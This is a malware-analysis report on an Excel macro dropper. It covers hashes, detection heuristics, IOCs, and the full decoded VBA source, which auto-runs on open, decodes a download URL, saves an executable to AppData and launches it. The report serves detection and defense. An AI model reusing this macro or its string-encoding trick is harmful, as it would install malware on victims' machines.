Xls.Dropper.Agent-9337433-0 — Office (OLE) malware analysis

Static analysis result for SHA-256 e2a46938cd94619e…

MALICIOUS

Office (OLE)

140.5 KB Created: 2020-08-13 13:37:22 Authoring application: Microsoft Excel First seen: 2020-09-15
MD5: e3de312a23a0f519ffd71e95e1949c73 SHA-1: 645252cd3d2d392d793dc17e8196099358c248e9 SHA-256: e2a46938cd94619e9ce8f276c84559b061c631382ef169041b3559ef68c5e6f5
276 Risk Score

Malware Insights

Xls.Dropper.Agent-9337433-0 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample is an Excel workbook whose VBA project contains a `Workbook_Open` handler (in a workbook-class module renamed `SiloKkbook`), so the macro runs as soon as the document is opened with macros enabled — which is why the enable-content lure flagged below matters. `Workbook_Open` calls `MLoVnY`, which decodes two strings with the `Decrypt` routine (reverse the string, then subtract 1 from every character code). Note that the string quoted by the scanner, `fyf/`efohjT`ltcwvzR0psf{0mq/{jc/eqvujyjnfmjo00;tquui`, is the *encoded* form, not the decrypted URL; applying `Decrypt` exactly as written in the extracted macro yields hxxps://nilemixitupd[.]biz[.]pl/zero/Qyuvbsk_Signed_.exe (defanged). The second string, `fyf/xxdd`, decodes to `ccww.exe`, so the payload is written to `%AppData%\ccww.exe` via `URLDownloadToFileA` (imported from urlmon under the alias `DDBGe`) — it is not saved under the detection name shown above. `ShellExecuteA` (shell32, alias `BIYzzPFHzYBg`) is then invoked with the `open` verb on that path, i.e. classic downloader/dropper behaviour (T1105 followed by T1204.002). Practical IOCs from this result: the domain and URL path above, the drop path `%AppData%\ccww.exe`, and the macro SHA-256 listed under extracted artifacts; the second-stage binary itself is not part of this static analysis, so its hash and behaviour are unknown here.

Heuristics 8

  • ClamAV: Xls.Dropper.Agent-9337433-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Agent-9337433-0
  • Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD
    Reference to URLDownloadToFile API
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
    Private Declare Function DDBGe Lib "urlmon" Alias _
    "URLDownloadToFileA" (ByVal lsWjjyCFxVleNvySvzNKt As Long, ByVal GggHPcEXDbtStEyQAWGRW As String, _
    ByVal TfwKSTdBvYbHN As String, ByVal hpfKFGEJuBIY As Long, ByVal zzPFH As Long) As Long
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    CnmYhjuikolpMNBVCXzaqswdefrVtbyhyujmhgffvbJolP = Environ$("AppData") & "\" & eMjuikLOpnBVcxZASDewqsdfgthyUjKMLOploiujHBnHYTgfrfvcDEsxdfgbHNM
  • Reference to ShellExecute API high SC_STR_SHELLEXEC
    Reference to ShellExecute API
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6798 bytes
SHA-256: 26c97b14415416399a8312a7194dc8a22a6b777d5a0afd7d53779bde5e1542a1
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
' Module1 contains only this empty stub; the p-code dump further down also shows the
' Module1 stream as a single empty Sub, so it carries no payload logic (likely filler).
Sub Sib()

End Sub

Attribute VB_Name = "SiloKkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Win32 import: shell32!ShellExecuteA hidden behind the random alias BIYzzPFHzYBg.
' The six parameters (Long, String x4, Long) match ShellExecuteA's hwnd / verb / file /
' parameters / directory / show-command layout; MLoVnY calls it with the "open" verb
' on the downloaded file. This is the call behind the SC_STR_SHELLEXEC heuristic.
Private Declare Function BIYzzPFHzYBg Lib "shell32.dll" Alias _
"ShellExecuteA" (ByVal zYBgeLAULCPbJIwwXgsUoT As Long, ByVal sJVJHBTQnWiokvMNjkuR As String, _
ByVal ycrXexFvbVWUZKE As String, ByVal LpQBRVXPpRwhdQm As String, ByVal cShrZZMzZwJXEVIMmZXRkh As String, ByVal DZyEALOezAKT As Long) As Long

' Win32 import: urlmon!URLDownloadToFileA hidden behind the random alias DDBGe
' (pCaller, szURL, szFileName, dwReserved, lpfnCB). This is the download primitive
' behind the SC_STR_URLDOWNLOAD / OLE_VBA_DOWNLOAD heuristics above.
Private Declare Function DDBGe Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal lsWjjyCFxVleNvySvzNKt As Long, ByVal GggHPcEXDbtStEyQAWGRW As String, _
ByVal TfwKSTdBvYbHN As String, ByVal hpfKFGEJuBIY As Long, ByVal zzPFH As Long) As Long

' Dropper body, reached from Workbook_Open. Decodes the drop filename and the payload URL
' with Decrypt, downloads the payload into the user's AppData directory and launches it.
' Only three of the six Dim'd strings are ever assigned; the other three are filler.
Sub MLoVnY()
Dim BcthYUjKmIOlPVCDrfvgTRewSQaZxSdfFRtyuIkiopmn As String
Dim eMjuikLOpnBVcxZASDewqsdfgthyUjKMLOploiujHBnHYTgfrfvcDEsxdfgbHNM As String
Dim CnmYhjuikolpMNBVCXzaqswdefrVtbyhyujmhgffvbJolP As String
Dim cFgTbNhjukioplmnbvcxzASDFghJUYHGtRfehrOlPlmJNHgthyui As String
Dim QyhndwsxeOlpokmnjHyhgtRfcvdefThyujOlpKMJuhyVbNc As String
Dim DbghyhujikolpokmNHghDDeWqaZXSXCDvetyrtghjuikdfvrtyJD As String

' Decrypt("fyf/xxdd") -> "ccww.exe" (StrReverse, then Chr(Asc(c) - 1) per character)
eMjuikLOpnBVcxZASDewqsdfgthyUjKMLOploiujHBnHYTgfrfvcDEsxdfgbHNM = Decrypt("fyf/xxdd")

' Drop path: %AppData%\ccww.exe (per-user roaming profile directory)
CnmYhjuikolpMNBVCXzaqswdefrVtbyhyujmhgffvbJolP = Environ$("AppData") & "\" & eMjuikLOpnBVcxZASDewqsdfgthyUjKMLOploiujHBnHYTgfrfvcDEsxdfgbHNM


' Encoded payload URL; Decrypt yields hxxps://nilemixitupd[.]biz[.]pl/zero/Qyuvbsk_Signed_.exe
BcthYUjKmIOlPVCDrfvgTRewSQaZxSdfFRtyuIkiopmn = Decrypt("fyf/`efohjT`ltcwvzR0psf{0mq/{jc/eqvujyjnfmjo00;tquui")

' URLDownloadToFileA(0, url, dropPath, 0, 0) - the HRESULT is discarded, so a failed
' download still falls through to the execute call below.
DDBGe 0, BcthYUjKmIOlPVCDrfvgTRewSQaZxSdfFRtyuIkiopmn, CnmYhjuikolpMNBVCXzaqswdefrVtbyhyujmhgffvbJolP, 0, 0
' ShellExecuteA(0, "open", dropPath, "", NULL, vbNormalFocus = 1 / SW_SHOWNORMAL):
' runs the downloaded executable in the user's context.
BIYzzPFHzYBg 0, "open", CnmYhjuikolpMNBVCXzaqswdefrVtbyhyujmhgffvbJolP, "", vbNullString, vbNormalFocus
End Sub

' Auto-execution trigger: Excel raises Workbook_Open when the file is opened with macros
' enabled. The module's VB_Base GUID {00020819-...} appears to be the Excel Workbook
' class, i.e. this is ThisWorkbook renamed to SiloKkbook. Beyond clicking "Enable Content"
' no user interaction is needed; the whole chain runs from here via MLoVnY.
Sub Workbook_Open()

MLoVnY
End Sub


' String decoder used for both the drop filename and the download URL: reverse the input,
' then shift every character code down by one. To re-encode: reverse, then Chr(Asc(c) + 1).
' The module has no Option Explicit, so the undeclared loop variable m and the misspelled
' doar (declared as daor) still compile; the trailing loop over doar never iterates.
Function Decrypt(enc)
    Dim x, m_
    Dim AppData, daor As Variant
    ' Step 1: reverse the encoded string.
    enc = StrReverse(enc)
    ' Step 2: shift each character code down by one. "AppData" is just a misleading
    ' local name for the output accumulator; it is unrelated to the AppData directory.
    For m = 1 To Len(enc)
        x = Mid(enc, m, 1)
        AppData = AppData & Chr(Asc(x) - 1)
    Next
    Decrypt = AppData
    ' Filler: doar is never assigned (Len of an Empty Variant is 0), so this runs zero times.
    For d = 1 To Len(doar)
    doar = ""
    Next
End Function


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

' Processing file: /tmp/qstore_dvbsbmbi
' ===============================================================================
' NOTE (review): the identifier names in this p-code disassembly do not line up with the
' decompressed source above (e.g. the routine disassembled below as "Workbook_Open(daor, ...)"
' has the shape of Decrypt(enc), and the two Declare lines show library/alias strings in
' parameter positions). The opcode sequence and the string literals ("fyf/xxdd" and the
' encoded URL) do match the source statement for statement, so this looks like a mis-resolved
' name table rather than VBA stomping (source and p-code diverging); confirm with a second
' p-code tool before relying on any name taken from this dump.
' Module streams:
' _VBA_PROJECT_CUR/VBA/Module1 - 950 bytes
' Line #0:
' 	FuncDefn (Sub sJVJHBTQnWiokvMNjkuR())
' Line #1:
' Line #2:
' 	EndSub 
' _VBA_PROJECT_CUR/VBA/SiloKkbook - 4446 bytes
' Line #0:
' 	LineCont 0x0008 07 00 00 00 13 00 00 00
' 	FuncDefn (Private Declare Function LpQBRVXPpRwhdQm Lib "TfwKSTdBvYbHN" (ByVal cShrZZMzZwJXEVIMmZXRkh As Long, ByVal DZyEALOezAKT As String, ByVal shell32.dll As String, ByVal DDBGe As String, ByVal lsWjjyCFxVleNvySvzNKt As String, ByVal GggHPcEXDbtStEyQAWGRW As Long) As Long)
' Line #1:
' Line #2:
' 	LineCont 0x0008 07 00 00 00 13 00 00 00
' 	FuncDefn (Private Declare Function hpfKFGEJuBIY Lib "CnmYhjuikolpMNBVCXzaqswdefrVtbyhyujmhgffvbJolP" (ByVal zzPFH As Long, ByVal urlmon As String, ByVal MLoVnY As String, ByVal BcthYUjKmIOlPVCDrfvgTRewSQaZxSdfFRtyuIkiopmn As Long, ByVal eMjuikLOpnBVcxZASDewqsdfgthyUjKMLOploiujHBnHYTgfrfvcDEsxdfgbHNM As Long) As Long)
' Line #3:
' Line #4:
' 	FuncDefn (Sub cFgTbNhjukioplmnbvcxzASDFghJUYHGtRfehrOlPlmJNHgthyui())
' Line #5:
' 	Dim 
' 	VarDefn QyhndwsxeOlpokmnjHyhgtRfcvdefThyujOlpKMJuhyVbNc (As String)
' Line #6:
' 	Dim 
' 	VarDefn DbghyhujikolpokmNHghDDeWqaZXSXCDvetyrtghjuikdfvrtyJD (As String)
' Line #7:
' 	Dim 
' 	VarDefn Decrypt (As String)
' Line #8:
' 	Dim 
' 	VarDefn Environ (As String)
' Line #9:
' 	Dim 
' 	VarDefn vbNullString (As String)
' Line #10:
' 	Dim 
' 	VarDefn vbNormalFocus (As String)
' Line #11:
' Line #12:
' 	LitStr 0x0008 "fyf/xxdd"
' 	ArgsLd Workbook_Open 0x0001 
' 	St DbghyhujikolpokmNHghDDeWqaZXSXCDvetyrtghjuikdfvrtyJD 
' Line #13:
' Line #14:
' 	LitStr 0x0007 "AppData"
' 	ArgsLd enc$ 0x0001 
' 	LitStr 0x0001 "\"
' 	Concat 
' 	Ld DbghyhujikolpokmNHghDDeWqaZXSXCDvetyrtghjuikdfvrtyJD 
' 	Concat 
' 	St Decrypt 
' Line #15:
' Line #16:
' Line #17:
' 	LitStr 0x0034 "fyf/`efohjT`ltcwvzR0psf{0mq/{jc/eqvujyjnfmjo00;tquui"
' 	ArgsLd Workbook_Open 0x0001 
' 	St QyhndwsxeOlpokmnjHyhgtRfcvdefThyujOlpKMJuhyVbNc 
' Line #18:
' Line #19:
' 	LitDI2 0x0000 
' 	Ld QyhndwsxeOlpokmnjHyhgtRfcvdefThyujOlpKMJuhyVbNc 
' 	Ld Decrypt 
' 	LitDI2 0x0000 
' 	LitDI2 0x0000 
' 	ArgsCall hpfKFGEJuBIY 0x0005 
' Line #20:
' 	LitDI2 0x0000 
' 	LitStr 0x0004 "open"
' 	Ld Decrypt 
' 	LitStr 0x0000 ""
' 	Ld x 
' 	Ld m_ 
' 	ArgsCall LpQBRVXPpRwhdQm 0x0006 
' Line #21:
' 	EndSub 
' Line #22:
' Line #23:
' 	FuncDefn (Sub AppData())
' Line #24:
' Line #25:
' 	ArgsCall cFgTbNhjukioplmnbvcxzASDFghJUYHGtRfehrOlPlmJNHgthyui 0x0000 
' Line #26:
' 	EndSub 
' Line #27:
' Line #28:
' Line #29:
' 	FuncDefn (Function Workbook_Open(daor, id_FFFE As Variant))
' Line #30:
' 	Dim 
' 	VarDefn StrReverse
' 	VarDefn m
' Line #31:
' 	Dim 
' 	VarDefn Chr
' 	VarDefn Asc (As Variant)
' Line #32:
' 	Ld daor 
' 	ArgsLd d 0x0001 
' 	St daor 
' Line #33:
' 	StartForVariable 
' 	Ld doar 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld daor 
' 	FnLen 
' 	For 
' Line #34:
' 	Ld daor 
' 	Ld doar 
' 	LitDI2 0x0001 
' 	ArgsLd Mid 0x0003 
' 	St StrReverse 
' Line #35:
' 	Ld Chr 
' 	Ld StrReverse 
' 	ArgsLd Sheet2 0x0001 
' 	LitDI2 0x0001 
' 	Sub 
' 	ArgsLd Sheet1 0x0001 
' 	Concat 
' 	St Chr 
' Line #36:
' 	StartForVariable 
' 	Next 
' Line #37:
' 	Ld Chr 
' 	St Workbook_Open 
' Line #38:
' 	StartForVariable 
' 	Ld Sheet3 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld Workbook 
' 	FnLen 
' 	For 
' Line #39:
' 	LitStr 0x0000 ""
' 	St Workbook 
' Line #40:
' 	StartForVariable 
' 	Next 
' Line #41:
' 	EndFunc 
' Line #42:
' _VBA_PROJECT_CUR/VBA/Sheet1 - 977 bytes
' _VBA_PROJECT_CUR/VBA/Sheet2 - 977 bytes
' _VBA_PROJECT_CUR/VBA/Sheet3 - 977 bytes